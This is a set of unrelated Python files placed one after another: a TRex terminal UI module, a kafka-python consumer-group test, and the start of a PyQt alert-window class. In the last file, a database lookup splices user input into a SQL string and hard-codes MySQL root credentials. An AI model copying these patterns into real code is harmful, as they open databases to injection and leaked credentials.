            if info.get('color'):
                entry = format_text(entry, info.get('color'))

            fragment += entry

        return fragment

    def generate_legend(self):
        """Rebuild the legend: global keys first, then the active panel's."""
        self.legend = "\n{:<12}".format("browse:")
        self.legend += self._render_actions(self.key_actions)

        self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
        self.legend += self._render_actions(self.main_panel.get_key_actions())

    def print_connection_status(self, buffer):
        if self.tui.get_state() == self.tui.STATE_ACTIVE:
            self.conn_bar.show(buffer = buffer)
        else:
            self.dis_bar.show(buffer = buffer)

    def print_legend(self, buffer):
        print(format_text(self.legend, 'bold'), file = buffer)

    # on window switch or turn on / off of the TUI we call this
    def init(self, show_log = False, locked = False):
        self.show_log = show_log
        self.locked = locked
        self.generate_legend()

    def show(self, show_legend, buffer):
        try:
            self.main_panel.show(buffer)
        except Exception:
            # panels may fail transiently while the server connection is
            # down - swallow only in that case (was a bare `except:`,
            # which also hid KeyboardInterrupt/SystemExit)
            if self.client.is_connected():
                raise

        self.print_connection_status(buffer)

        if show_legend:
            self.generate_legend()
            self.print_legend(buffer)

        if self.show_log:
            self.log.show(buffer)

    def handle_key(self, ch):
        """Route a key press to the manager or the active panel.

        Returns True if the key was handled, False otherwise.
        """
        # check for the manager registered actions
        if ch in self.key_actions:
            msg = self.key_actions[ch]['action']()

        # check for main panel actions
        elif ch in self.main_panel.get_key_actions():
            msg = self.main_panel.get_key_actions()[ch]['action']()

        else:
            return False

        self.generate_legend()
        return True

    # actions

    def action_none(self):
        return None

    def action_show_dash(self):
        self.main_panel = self.panels['dashboard']
        self.init(self.show_log)
        return ""

    def action_show_port(self, port_id):
        # returns a closure bound to a specific port panel
        def action_show_port_x():
            self.main_panel = self.panels['port {0}'.format(port_id)]
            self.init()
            return ""

        return action_show_port_x

    def action_show_sstats(self):
        self.main_panel = self.panels['sstats']
        self.init(self.show_log)
        return ""

    def action_show_astats(self):
        self.main_panel = self.panels['astats']
        self.init(self.show_log)
        return ""

    def action_show_lstats(self):
        self.main_panel = self.panels['lstats']
        self.init(self.show_log)
        return ""

    def action_show_ustats(self):
        self.main_panel = self.panels['ustats']
        self.init(self.show_log)
        return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
    """Renders TUI frames on a background thread so the main loop never
    blocks on drawing.

    `update()` requests a frame; the worker calls `redraw_cb(buffer)`
    into a StringIO and publishes it as `snapshot`, which `get()` hands
    out exactly once.
    """

    def __init__(self, redraw_cb):
        self.snapshot = ''
        self.lock = threading.Lock()
        self.redraw_cb = redraw_cb   # callable(buffer) that draws one frame
        self.update_flag = False

    def start(self):
        """Spawn the background render thread."""
        self.active = True
        self.t = threading.Thread(target = self.__handler)
        # FIX: Thread.setDaemon() is deprecated - assign the attribute
        self.t.daemon = True
        self.t.start()

    def stop(self):
        """Signal the worker to finish and wait for it."""
        self.active = False
        self.t.join()

    # request an update
    def update(self):
        self.update_flag = True

    # fetch the screen, return None if no new screen exists yet
    def get(self):
        """Return the pending frame (a StringIO), or None.

        The frame is consumed: a second call returns None until the next
        redraw completes.
        """
        if not self.snapshot:
            return None

        # we have a snapshot - fetch it
        with self.lock:
            x = self.snapshot
            self.snapshot = None
            return x

    def __handler(self):
        # worker loop - polls the update flag ~100 times a second
        while self.active:
            if self.update_flag:
                self.__redraw()

            time.sleep(0.01)

    # redraw the next screen
    def __redraw(self):
        buffer = StringIO()

        self.redraw_cb(buffer)

        # publish the frame and clear the request atomically
        with self.lock:
            self.snapshot = buffer
            self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
    """Rate-limits redraw requests: a pending mark is honored only after
    `rate` seconds have passed since the last reset, unless forced."""

    def __init__(self, rate):
        self.ts = 0
        self.marked = False
        self.rate = rate
        self.force = False

    def mark_for_redraw(self, force = False):
        self.marked = True
        # a forced mark stays forced until the next reset
        self.force = self.force or force

    def should_redraw(self):
        if self.force:
            return True
        elapsed = time.time() - self.ts
        return self.marked and (elapsed > self.rate)

    def reset(self, restart = False):
        self.ts = time.time()
        self.marked = restart
        self.force = False
# shows a textual top style window
class TrexTUI():
    """Top-level TUI controller.

    Validates the console size, runs the render / input loop and a small
    connection state machine that auto-reconnects to the server.
    """

    # connection state machine states
    STATE_ACTIVE = 0
    STATE_LOST_CONT = 1
    STATE_RECONNECT = 2

    is_graph = False
    # number of live TUI instances (see has_instance)
    _ref_cnt = 0

    # minimal console dimensions required to render the panels
    MIN_ROWS = 45
    MIN_COLS = 111

    class ScreenSizeException(Exception):
        """Raised when the console is smaller than MIN_COLS x MIN_ROWS."""
        def __init__(self, cols, rows):
            msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
                                                                                                    TrexTUI.MIN_ROWS,
                                                                                                    cols,
                                                                                                    rows)
            super(TrexTUI.ScreenSizeException, self).__init__(msg)

    def __init__(self, console):
        self.console = console
        self.client = console.client

        # serializes panel rendering against console commands
        self.tui_global_lock = threading.Lock()
        self.pm = TrexTUIPanelManager(self)
        self.sb = ScreenBuffer(self.redraw_handler)

        TrexTUI._ref_cnt += 1

    def __del__(self):
        TrexTUI._ref_cnt -= 1

    @classmethod
    def has_instance(cls):
        """True while at least one TUI instance is alive."""
        return cls._ref_cnt > 0

    def redraw_handler(self, buffer):
        # this is executed by the screen buffer - should be protected against TUI commands
        with self.tui_global_lock:
            self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)

    def clear_screen(self, lines = 50):
        """Clear `lines` rows using ANSI escapes and home the cursor."""
        # reposition the cursor
        sys.stdout.write("\x1b[0;0H")

        # clear all lines
        for i in range(lines):
            sys.stdout.write("\x1b[0K")
            if i < (lines - 1):
                sys.stdout.write("\n")

        # reposition the cursor
        sys.stdout.write("\x1b[0;0H")

    def show(self, client, save_console_history, show_log = False, locked = False):
        """Entry point: validate the terminal and run the TUI loop.

        Raises ScreenSizeException if the console is too small.
        """
        # NOTE(review): uses `stty size`, so this requires a POSIX tty
        rows, cols = os.popen('stty size', 'r').read().split()

        if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
            raise self.ScreenSizeException(rows = rows, cols = cols)

        # AsyncKeys switches the terminal to raw mode for the duration
        with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
            sys.stdout.write("\x1bc")   # full terminal reset
            self.async_keys = async_keys
            self.show_internal(show_log, locked)

    def show_internal(self, show_log, locked):
        """Main loop: poll keys, render frames, drive the state machine."""
        self.pm.init(show_log, locked)

        self.state = self.STATE_ACTIVE
        self.time_ts = None

        # create print policers
        self.full_redraw = RedrawPolicer(0.5)
        self.keys_redraw = RedrawPolicer(0.05)
        self.full_redraw.mark_for_redraw()

        try:
            self.sb.start()

            while True:
                # draw and handle user input
                status = self.async_keys.tick(self.pm)

                # prepare the next frame
                self.prepare(status)
                time.sleep(0.01)
                self.draw_screen()

                with self.tui_global_lock:
                    self.handle_state_machine()

        except TUIQuit:
            print("\nExiting TUI...")
        except KeyboardInterrupt:
            print("\nExiting TUI...")

        finally:
            self.sb.stop()

        print("")

    # handle state machine
    def handle_state_machine(self):
        # regular state
        if self.state == self.STATE_ACTIVE:
            # if no connectivity - move to lost connecitivty
            if not self.client.is_connected():
                self.state = self.STATE_LOST_CONT
                self.time_ts = time.time()

        # lost connectivity
        elif self.state == self.STATE_LOST_CONT:
            # if the connection is alive (some data is arriving on the async channel)
            # try to reconnect after a 5 second grace period
            if (time.time() - self.time_ts) > 5.0:
                # move to state reconnect
                self.state = self.STATE_RECONNECT

        # restored connectivity - try to reconnect
        elif self.state == self.STATE_RECONNECT:
            try:
                self.client.connect()
                self.client.acquire()
                self.state = self.STATE_ACTIVE
            except TRexError:
                # reconnect failed - wait another grace period
                self.state = self.STATE_LOST_CONT
                self.time_ts = time.time()

    # logic before printing
    def prepare(self, status):
        if status == AsyncKeys.STATUS_REDRAW_ALL:
            self.full_redraw.mark_for_redraw(force = True)

        elif status == AsyncKeys.STATUS_REDRAW_KEYS:
            self.keys_redraw.mark_for_redraw()

        if self.full_redraw.should_redraw():
            self.sb.update()
            self.full_redraw.reset(restart = True)

        return

    # draw once
    def draw_screen(self):
        # check for screen buffer's new screen
        x = self.sb.get()

        # we have a new screen to draw
        if x:
            self.clear_screen()

            self.async_keys.draw(x)
            sys.stdout.write(x.getvalue())
            sys.stdout.flush()

        # maybe we need to redraw the keys
        elif self.keys_redraw.should_redraw():
            # move up 4 lines (the key/status area) and redraw it in place
            sys.stdout.write("\x1b[4A")
            self.async_keys.draw(sys.stdout)
            sys.stdout.flush()

            # reset the policer for next time
            self.keys_redraw.reset()

    def get_state(self):
        return self.state
class TokenParser(object):
    """Splits raw stdin input into tokens.

    Regular characters become single-char tokens; an ESC ('\\x1b')
    greedily absorbs the remainder of the buffer as one escape-sequence
    token.
    """

    def __init__(self, seq):
        self.buffer = list(seq)

    def pop(self):
        return self.buffer.pop(0)

    def peek(self):
        return self.buffer[0] if self.buffer else None

    def next_token(self):
        """Return the next token, or None when the buffer is exhausted."""
        if self.peek() is None:
            return None

        token = self.pop()

        # special chars - ESC swallows everything left in the buffer
        if token == '\x1b':
            token += ''.join(self.buffer)
            del self.buffer[:]

        return token

    def parse(self):
        """Consume the whole buffer and return the list of tokens."""
        tokens = []
        token = self.next_token()
        while token is not None:
            tokens.append(token)
            token = self.next_token()

        return tokens
# handles async IO
class AsyncKeys:
    """Raw-terminal keyboard front end for the TUI.

    Owns two input engines - legend (navigation) and console - and
    switches between them on ESC.  Entering the context manager puts the
    terminal into non-echo, non-canonical mode; exiting restores it.
    """

    MODE_LEGEND = 1
    MODE_CONSOLE = 2

    STATUS_NONE = 0
    STATUS_REDRAW_KEYS = 1
    STATUS_REDRAW_ALL = 2

    def __init__(self, client, console, save_console_history, tui_global_lock, locked = False):
        self.tui_global_lock = tui_global_lock
        self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
        self.engine_legend = AsyncKeysEngineLegend(self)
        self.locked = locked

        # when locked, only the legend (navigation) engine is available
        # (was assigned three times in the original - once is enough)
        self.engine = self.engine_legend if locked else self.engine_console

    def __enter__(self):
        # init termios: no echo, no line buffering, non-blocking reads
        # (VMIN = VTIME = 0)
        self.old_settings = termios.tcgetattr(sys.stdin)
        new_settings = termios.tcgetattr(sys.stdin)
        new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON)  # lflags
        new_settings[6][termios.VMIN] = 0   # cc
        new_settings[6][termios.VTIME] = 0  # cc

        # huge buffer - no print without flush
        sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)

        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)
        return self

    def __exit__(self, type, value, traceback):
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)

        # restore sys.stdout
        sys.stdout.close()
        sys.stdout = sys.__stdout__

    def is_legend_mode(self):
        return self.engine.get_type() == AsyncKeys.MODE_LEGEND

    def is_console_mode(self):
        # BUG FIX: the original compared the bound method object
        # (self.engine.get_type) to MODE_CONSOLE, which is always False
        return self.engine.get_type() == AsyncKeys.MODE_CONSOLE

    def switch(self):
        """Toggle between the legend and console engines."""
        if self.is_legend_mode():
            self.engine = self.engine_console
        else:
            self.engine = self.engine_legend

    def handle_token(self, token, pm):
        """Dispatch a single token; returns a STATUS_* value (or None)."""
        # ESC for switch
        if token == '\x1b':
            if not self.locked:
                self.switch()
            return self.STATUS_REDRAW_ALL

        # EOF (ctrl + D)
        if token == '\x04':
            raise TUIQuit()

        # pass tick to engine
        return self.engine.tick(token, pm)

    def tick(self, pm):
        rc = self.STATUS_NONE

        # fetch the stdin buffer (non-blocking thanks to VMIN/VTIME = 0)
        seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
        if not seq:
            return self.STATUS_NONE

        # parse all the tokens from the buffer and process them
        for token in TokenParser(seq).parse():
            token_rc = self.handle_token(token, pm)
            # BUG FIX: engines may return None (e.g. TAB on an empty
            # console line); max(int, None) raises TypeError on Python 3
            if token_rc is not None:
                rc = max(rc, token_rc)

        return rc

    def draw(self, buffer):
        self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
    """Key handler for legend (navigation) mode.

    Forwards single keys to the panel manager and maps arrow escape
    sequences to scroll commands.  'q' quits the TUI.
    """

    def __init__(self, async_):
        self.async_ = async_

    def get_type(self):
        return self.async_.MODE_LEGEND

    def tick(self, seq, pm):
        if seq == 'q':
            raise TUIQuit()

        # multi-char sequences: arrow keys scroll, anything else is ignored
        if len(seq) > 1:
            arrows = {'\x1b\x5b\x41': 'Up',
                      '\x1b\x5b\x42': 'Down',
                      '\x1b\x5b\x43': 'Right',
                      '\x1b\x5b\x44': 'Left'}
            if seq in arrows:
                pm.handle_key(arrows[seq])
            return AsyncKeys.STATUS_NONE

        handled = pm.handle_key(seq)
        return AsyncKeys.STATUS_REDRAW_ALL if handled else AsyncKeys.STATUS_NONE

    def draw(self, buffer):
        # legend mode draws nothing below the panels
        pass
# console engine
class AsyncKeysEngineConsole:
    """Key handler for console mode.

    A minimal readline emulation: command history (`self.lines`), cursor
    editing via escape sequences, TAB completion for command names and
    file paths, and dispatch of completed commands to the client's
    console methods.  `self.lines[0]` is always the line being typed.
    """

    def __init__(self, async_, console, client, save_console_history):
        self.async_ = async_
        self.lines = deque(maxlen = 100)

        self.generate_prompt = console.generate_prompt
        self.save_console_history = save_console_history

        # command name -> handler, from the client plus local TUI commands
        self.ac = client.get_console_methods()

        self.ac.update({'quit' : self.action_quit,
                        'q' : self.action_quit,
                        'exit' : self.action_quit,
                        'help' : self.action_help,
                        '?' : self.action_help})

        # fetch readline history and add relevants
        # NOTE(review): readline items are indexed 1..length inclusive,
        # so this range skips the most recent entry - confirm intended
        for i in range(1, readline.get_current_history_length()):
            cmd = readline.get_history_item(i)
            if cmd.strip() and cmd.split()[0] in self.ac:
                self.lines.appendleft(CmdLine(cmd))

        # new line
        self.lines.appendleft(CmdLine(''))
        self.line_index = 0
        self.last_status = ''

    def action_quit(self, _):
        raise TUIQuit()

    def action_help(self, _):
        # list all known commands, bolded
        return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])

    def get_type(self):
        return self.async_.MODE_CONSOLE

    def handle_escape_char(self, seq):
        """Map a multi-byte escape sequence to an editing action.

        Returns STATUS_REDRAW_KEYS when handled, STATUS_NONE for unknown
        sequences.
        """
        # up - older history entry
        if seq == '\x1b[A':
            self.line_index = min(self.line_index + 1, len(self.lines) - 1)

        # down - newer history entry
        elif seq == '\x1b[B':
            self.line_index = max(self.line_index - 1, 0)

        # left
        elif seq == '\x1b[D':
            self.lines[self.line_index].go_left()

        # right
        elif seq == '\x1b[C':
            self.lines[self.line_index].go_right()

        # del
        elif seq == '\x1b[3~':
            self.lines[self.line_index].del_key()

        # home
        elif seq in ('\x1b[H', '\x1b\x4fH'):
            self.lines[self.line_index].home_key()

        # end
        elif seq in ('\x1b[F', '\x1b\x4fF'):
            self.lines[self.line_index].end_key()

        # Alt + Backspace - delete the word left of the cursor
        elif seq == '\x1b\x7f':
            pos = orig_pos = self.lines[self.line_index].cursor_index
            cut_to_pos = None
            line = self.lines[self.line_index].get()
            # scan left for the start of the current word
            while pos >= 1:
                if pos == 1:
                    cut_to_pos = 0
                elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                    cut_to_pos = pos - 1
                    break
                pos -= 1
            if cut_to_pos is not None:
                self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)

        # Alt + Left or Ctrl + Left - jump to previous word start
        elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
            pos = self.lines[self.line_index].cursor_index
            move_to_pos = None
            line = self.lines[self.line_index].get()
            while pos >= 1:
                if pos == 1:
                    move_to_pos = 0
                elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                    move_to_pos = pos - 1
                    break
                pos -= 1
            if move_to_pos is not None:
                self.lines[self.line_index].cursor_index = move_to_pos

        # Alt + Right or Ctrl + Right - jump to next word end
        elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
            pos = self.lines[self.line_index].cursor_index
            move_to_pos = None
            line = self.lines[self.line_index].get()
            while pos <= len(line) - 1:
                if pos == len(line) - 1:
                    move_to_pos = len(line)
                elif line[pos] != ' ' and line[pos + 1] == ' ':
                    move_to_pos = pos + 1
                    break
                pos += 1
            if move_to_pos is not None:
                self.lines[self.line_index].cursor_index = move_to_pos

        # PageUp - search history backwards for the current prefix
        elif seq == '\x1b\x5b\x35\x7e':
            line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
            index = self.line_index
            while index < len(self.lines) - 1:
                index += 1
                if self.lines[index].get().startswith(line_part):
                    self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                    self.line_index = index
                    break

        # PageDown - search history forwards for the current prefix
        elif seq == '\x1b\x5b\x36\x7e':
            line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
            index = self.line_index
            while index > 0:
                index -= 1
                if self.lines[index].get().startswith(line_part):
                    self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                    self.line_index = index
                    break

        # unknown key
        else:
            return AsyncKeys.STATUS_NONE

        return AsyncKeys.STATUS_REDRAW_KEYS

    def tick(self, seq, _):
        # handle escape chars
        if len(seq) > 1:
            return self.handle_escape_char(seq)

        # handle each char
        # NOTE(review): the loop returns on the first char, so a token is
        # effectively one char here
        for ch in seq:
            return self.handle_single_key(ch)

    def handle_single_key(self, ch):
        """Process one printable/control character.

        Returns STATUS_REDRAW_KEYS, or None for TAB on an empty line.
        """
        # newline
        if ch == '\n':
            self.handle_cmd()

        # backspace
        elif ch == '\x7f':
            self.lines[self.line_index].backspace()

        # TAB - complete command name (first token) or filename
        elif ch == '\t':
            tokens = self.lines[self.line_index].get().split()
            if not tokens:
                return
            if len(tokens) == 1:
                self.handle_tab_names(tokens[0])
            else:
                self.handle_tab_files(tokens)

        # simple char
        else:
            self.lines[self.line_index] += ch

        return AsyncKeys.STATUS_REDRAW_KEYS

    # handle TAB key for completing function names
    def handle_tab_names(self, cur):
        matching_cmds = [x for x in self.ac if x.startswith(cur)]

        common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
        if common:
            if len(matching_cmds) == 1:
                # unique match - complete it and add a trailing space
                self.lines[self.line_index].set(common + ' ')
                self.last_status = ''
            else:
                # complete up to the common prefix, list the candidates
                # NOTE(review): 'ambigious' typo is in a displayed string
                self.lines[self.line_index].set(common)
                self.last_status = 'ambigious: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])

    # handle TAB for completing filenames
    def handle_tab_files(self, tokens):

        # only commands with files
        if tokens[0] not in {'start', 'push'}:
            return

        # '-f' with no parameters - no partial and use current dir
        if tokens[-1] == '-f':
            partial = ''
            d = '.'

        # got a partial path
        elif tokens[-2] == '-f':
            partial = tokens.pop()

            # check for dirs
            dirname, basename = os.path.dirname(partial), os.path.basename(partial)
            if os.path.isdir(dirname):
                d = dirname
                partial = basename
            else:
                d = '.'
        else:
            return

        # fetch all dirs and files matching wildcard
        files = []
        for x in os.listdir(d):
            if os.path.isdir(os.path.join(d, x)):
                files.append(x + '/')
            elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
                files.append(x)

        # dir might not have the files
        if not files:
            self.last_status = format_text('no loadble files under path', 'bold')
            return

        # find all the matching files
        matching_files = [x for x in files if x.startswith(partial)] if partial else files

        # do we have a longer common than partial ?
        common = os.path.commonprefix([x for x in files if x.startswith(partial)])
        if not common:
            common = partial

        tokens.append(os.path.join(d, common) if d != '.' else common)

        # reforge the line
        newline = ' '.join(tokens)

        if len(matching_files) == 1:
            if os.path.isfile(tokens[-1]):
                newline += ' '

            self.lines[self.line_index].set(newline)
            self.last_status = ''
        else:
            self.lines[self.line_index].set(newline)
            # show at most 5 candidates in the status line
            self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
            if len(matching_files) > 5:
                self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)

    def split_cmd(self, cmd):
        """Split a command line into (op, param-string)."""
        s = cmd.split(' ', 1)
        op = s[0]
        param = s[1] if len(s) == 2 else ''
        return op, param

    def handle_cmd(self):
        """Execute the current line: dispatch, update history and status."""
        cmd = self.lines[self.line_index].get().strip()
        if not cmd:
            return

        op, param = self.split_cmd(cmd)

        func = self.ac.get(op)
        if func:
            # commands run under the global lock to keep rendering quiet
            with self.async_.tui_global_lock:
                func_rc = func(param)

        # take out the empty line
        empty_line = self.lines.popleft()
        assert(empty_line.ro_line == '')

        # avoid consecutive duplicate history entries
        if not self.lines or self.lines[0].ro_line != cmd:
            self.lines.appendleft(CmdLine(cmd))

        # back in
        self.lines.appendleft(empty_line)
        self.line_index = 0
        readline.add_history(cmd)
        self.save_console_history()

        # back to readonly
        for line in self.lines:
            line.invalidate()

        assert(self.lines[0].modified == False)
        color = None
        if not func:
            self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
        else:
            # internal commands (return a plain string status)
            if isinstance(func_rc, str):
                self.last_status = func_rc

            # RC response
            else:
                # success
                if func_rc is None:
                    self.last_status = format_text("[OK]", 'green')

                # errors
                else:
                    err_msgs = ascii_split(str(func_rc))
                    if not err_msgs:
                        err_msgs = ['Unknown error']

                    self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
                    if len(err_msgs) > 1:
                        self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
                    color = 'red'

        # trim too long lines
        if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
            self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')

    def draw(self, buffer):
        """Render the status line, prompt and current command line."""
        buffer.write("\nPress 'ESC' for navigation panel...\n")
        buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
        buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
        self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
    """An editable command line with readline-like cursor operations.

    The pristine text lives in `ro_line`; the first edit copies it into
    `w_line` and flips `modified`.  `invalidate()` discards the edits and
    restores the read-only text.
    """

    def __init__(self, line):
        self.ro_line = line        # read-only original text
        self.w_line = None         # working copy, valid only when modified
        self.modified = False
        self.cursor_index = len(line)

    def get(self):
        return self.w_line if self.modified else self.ro_line

    def set(self, line, cursor_pos = None):
        self.w_line = line
        self.modified = True
        self.cursor_index = len(line) if cursor_pos is None else cursor_pos

    def __add__(self, other):
        assert(0)   # only in-place append (+=) is supported

    def __str__(self):
        return self.get()

    def __iadd__(self, other):
        # insert `other` at the cursor and advance past it
        text = self.get()
        at = self.cursor_index
        self.set(text[:at] + other + text[at:], cursor_pos = at + len(other))
        return self

    def backspace(self):
        at = self.cursor_index
        if at == 0:
            return
        text = self.get()
        self.set(text[:at - 1] + text[at:], at - 1)

    def del_key(self):
        at = self.cursor_index
        text = self.get()
        if at == len(text):
            return
        self.set(text[:at] + text[at + 1:], at)

    def home_key(self):
        self.cursor_index = 0

    def end_key(self):
        self.cursor_index = len(self.get())

    def invalidate(self):
        self.modified = False
        self.w_line = None
        self.cursor_index = len(self.ro_line)

    def go_left(self):
        self.cursor_index = max(0, self.cursor_index - 1)

    def go_right(self):
        self.cursor_index = min(len(self.get()), self.cursor_index + 1)

    def draw(self, buffer):
        # write the text, then backspace the terminal cursor into position
        text = self.get()
        buffer.write(text)
        buffer.write('\b' * (len(text) - self.cursor_index))
|
test_consumer_group.py | import collections
import logging
import threading
import time
import pytest
import six
from kafka import SimpleClient
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.structs import TopicPartition
from test.conftest import version
from test.testutil import random_string
def get_connect_str(kafka_broker):
    """Return the broker fixture's bootstrap address as 'host:port'."""
    return '{0}:{1}'.format(kafka_broker.host, kafka_broker.port)
@pytest.fixture
def simple_client(kafka_broker):
    """Fixture: a SimpleClient connected to the test broker."""
    return SimpleClient(get_connect_str(kafka_broker))
@pytest.fixture
def topic(simple_client):
    """Fixture: create a random 5-char topic on the broker, return its name."""
    topic = random_string(5)
    simple_client.ensure_topic_exists(topic)
    return topic
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, version):
    """Smoke test: a consumer bootstraps and connects to the broker."""
    # 0.8.2 brokers need a topic to function well
    # NOTE(review): this calls the fixture-decorated functions directly;
    # newer pytest versions forbid direct fixture calls - confirm
    if version >= (0, 8, 2) and version < (0, 9):
        topic(simple_client(kafka_broker))
    consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
    # one poll forces metadata fetch and connection establishment
    consumer.poll(500)
    assert len(consumer._client._conns) > 0
    node_id = list(consumer._client._conns.keys())[0]
    # at least one broker connection must be fully CONNECTED
    assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
    """Group rebalance test: N consumers in one group must converge to a
    single generation with disjoint assignments covering the topic."""
    num_partitions = 4
    connect_str = get_connect_str(kafka_broker)
    consumers = {}
    stop = {}
    threads = {}
    # messages[consumer_index][TopicPartition] -> list of records.
    # BUG FIX: was defaultdict(list); indexing messages[i][tp] on a list
    # raised TypeError as soon as a record batch actually arrived.
    messages = collections.defaultdict(lambda: collections.defaultdict(list))
    group_id = 'test-group-' + random_string(6)

    def consumer_thread(i):
        assert i not in consumers
        assert i not in stop
        stop[i] = threading.Event()
        consumers[i] = KafkaConsumer(topic,
                                     bootstrap_servers=connect_str,
                                     group_id=group_id,
                                     heartbeat_interval_ms=500)
        while not stop[i].is_set():
            # BUG FIX: poll() returns {TopicPartition: [records]}; iterate
            # the (tp, records) pairs, not itervalues (which yielded bare
            # record lists and mis-unpacked them)
            for tp, records in six.iteritems(consumers[i].poll(100)):
                messages[i][tp].extend(records)
        consumers[i].close()
        del consumers[i]
        del stop[i]

    num_consumers = 4
    for i in range(num_consumers):
        t = threading.Thread(target=consumer_thread, args=(i,))
        t.start()
        threads[i] = t

    try:
        timeout = time.time() + 35
        while True:
            for c in range(num_consumers):

                # Verify all consumers have been created
                if c not in consumers:
                    break

                # Verify all consumers have an assignment
                elif not consumers[c].assignment():
                    break

            # If all consumers exist and have an assignment
            else:

                # Verify all consumers are in the same generation
                # then log state and break while loop
                generations = set([consumer._coordinator.generation
                                   for consumer in list(consumers.values())])

                # New generation assignment is not complete until
                # coordinator.rejoining = False
                rejoining = any([consumer._coordinator.rejoining
                                 for consumer in list(consumers.values())])

                if not rejoining and len(generations) == 1:
                    for c, consumer in list(consumers.items()):
                        logging.info("[%s] %s %s: %s", c,
                                     consumer._coordinator.generation,
                                     consumer._coordinator.member_id,
                                     consumer.assignment())
                    break
            assert time.time() < timeout, "timeout waiting for assignments"

        # the union of all assignments must be exactly the topic's partitions,
        # with no partition owned by two consumers
        group_assignment = set()
        for c in range(num_consumers):
            assert len(consumers[c].assignment()) != 0
            assert set.isdisjoint(consumers[c].assignment(), group_assignment)
            group_assignment.update(consumers[c].assignment())

        assert group_assignment == set([
            TopicPartition(topic, partition)
            for partition in range(num_partitions)])

    finally:
        # always stop the consumer threads, even on assertion failure
        for c in range(num_consumers):
            stop[c].set()
            threads[c].join()
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
    """pause()/resume() must toggle membership in consumer.paused()."""
    consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
    topics = [TopicPartition(topic, 1)]
    consumer.assign(topics)
    assert set(topics) == consumer.assignment()
    assert set() == consumer.paused()

    consumer.pause(topics[0])
    assert set([topics[0]]) == consumer.paused()

    consumer.resume(topics[0])
    assert set() == consumer.paused()

    # unsubscribing clears the paused set as well
    consumer.unsubscribe()
    assert set() == consumer.paused()
|
AlertSettings.py | # -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
import pygame
import pymysql
from PyQt5.QtCore import QTimer
import time
import smtplib
import os
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import multiprocessing
import datetime
class Ui_Alert3(object):
update = 1
count = 0
tw = time.time()
flag = False
def __init__(self, num):
self.num = num
self.timer = QTimer()
# set timer timeout callback function
self.timer.timeout.connect(self.viewcam)
# set control_bt callback clicked function
def viewcam(self):
t1 = time.time()
print('###############',self.num)
if t1 - self.tw >= self.update:
self.count += 1
con = self.num - self.count
self.btn_sndmail.setText('Send Mail ' + str(con))
print(con)
if con == 0:
print('Send Mail')
self.count = 0
self.btn_sndmail.setText('Send')
self.timer.stop()
P1 = multiprocessing.Process(target=self.send_mail)
P1.start()
self.tw = time.time()
def controlTimer(self):
# if timer is stopped
if not self.timer.isActive():
self.timer.start(20)
def stop_(self):
self.btn_sndmail.setText('Send Mail')
self.timer.stop()
def send_mail(self):
print('Mail has been Send')
def display_profile(self,f_name,f_name2):
self.curr_dt = str(datetime.datetime.now())
connnection = pymysql.connect("localhost","root","rootpass","project")
cursor = connnection.cursor()
select_query = "select * from blockacess where fname ='%s'" %(f_name)
cursor.execute(select_query)
row = cursor.fetchone()
self.lineEdit_id.setText(str(row[0]))
self.lineEdit_name.setText(row[1])
self.lineEdit_age.setText(row[3])
self.lineEdit_gender.setText(row[4])
self.lineEdit_nationality.setText(row[5])
self.lineEdit_other.setText(row[6])
